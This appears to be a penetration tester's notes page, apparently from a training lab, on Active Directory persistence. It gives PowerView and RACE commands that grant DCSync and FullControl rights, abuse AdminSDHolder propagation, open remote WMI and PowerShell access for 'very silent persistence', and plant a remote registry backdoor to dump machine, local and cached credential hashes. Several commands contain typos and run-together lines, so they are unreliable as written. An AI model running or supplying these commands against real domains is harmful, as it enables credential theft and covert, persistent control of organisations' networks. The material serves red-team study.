ACLs
#powershell
With DA privs, the ACL of the domain root can be modified to provide usefull rights like FullControl or the ability to run DCSync.
# Give yourself Fullcontrol over the root domain object
Add-ObjectAcl -TargetDisguishedName 'DC=mydomain,DC=local' -PrincipalSamAccountName doctordragon -Rights All -Verbose
# Give yourself DCSync rights over the root domain object
Add-ObjectAcl -TargetDisguishedName 'DC=mydomain,DC=local' -PrincipalSamAccountName doctordragon -GUIDRight DCSync -VerboseAdminSDHolder
An object that holds a blueprint of ACLs for certain built-in privileged group called Protected Groups
A Security Descriptor Propagator (SDPROP) runs every hour and overwrites the ACL from this container to all the member of the protected group.
Protected Groups
Account Operators
Backup Operators
Server Operators
Print Operators
Domain Admins
Replicator
Enterprise Admins
Domain Controllers
Read-only Domain Controllers
Schema Admins
Administrators
Well Known Groups for Abuse
Account Operator - Cannot modify DA/EA/BA groups. Can modify nested groups within these groups
Backup Operator - Backup GPO, edit or add SID of controlled account to a privileged group and restore
Server Operators - Run a command as SYSTEM (using disabled browser service)
Print Operator - copy ntds.dit backup, load device drivers
AdminSDHolder Abuse
If we can add our user to the AdminSDHolder object and give ourselves full control, the ACLs will propagate to all the protected objects and we will have full control over the protected objects.
# Powerview module to add ACL to the AdminSDHolder group
Add-DomainObjectAcl -TargetIdneitity 'CN=AdminSDHolder, CN=System, DC=dollarcorp, DC=moneycorp, DC=local' -PrincipalIdenitty student1 -Rights All -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose
# We can change all to be ResetPassword,WriteMembers
# Run SDPropagator
Invoke-SDPrpagator -timeoutMinutes 1 -showProgrss -Verbose
# We can veryfiy the domain admin privs using powerview
Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "student1"} Securable Objects
Security Descriptor
The SDDL (Security Descriptor Definition Language) defines the format used to descibe a security descriptor. SDDL uses ACE string for SACL and DACL.
ace_type;ace_flag;rights;object_guid;inherit_object_guid;accountSIDBy default, reguars users can't use remote WMI or Powershell remoting.
We can edit the security descriptor or the remote WMI and DCOM Object to provide ourselves full control over those object which can let us run WMI and DCOM remotely. This can be done by giving ourselves rights to connect to DCOM and rights to the namespace.
DCOM: Component Serivces -> My Computer ->Properties -> COM Security -> Edit Links -> Add User
WMI: Computer Management -> WMI Control -> Properties -> Security -> Add User
This is useful for maintaining very silent persistence, as this will only result in a normal logon in the DC logs, along with every other user logons. This can be done by using the RACE toolkit
Set-RemoteWMI -SamAccountName studentx -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose
Set-RemotePSRemoting -SamAccountName studentx -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose
Remote Registry
As a domain admin, we can use the RACE toolkit, to modify some registry keys, so that a regular user can:
Retrieve machine account hash.
Retrieve local account hash.
Retrieve domain cached credentials.
# Modify Regsitry keys
Add-RemoteRegBackdoor -ComputerName dcorp-dc -Trustee drdragon -verbose
# retrieve machine accout hash
Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose
Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose
Get-RemoteCachedCrednetials -ComputerName dcorp-dc -VerboseLast updated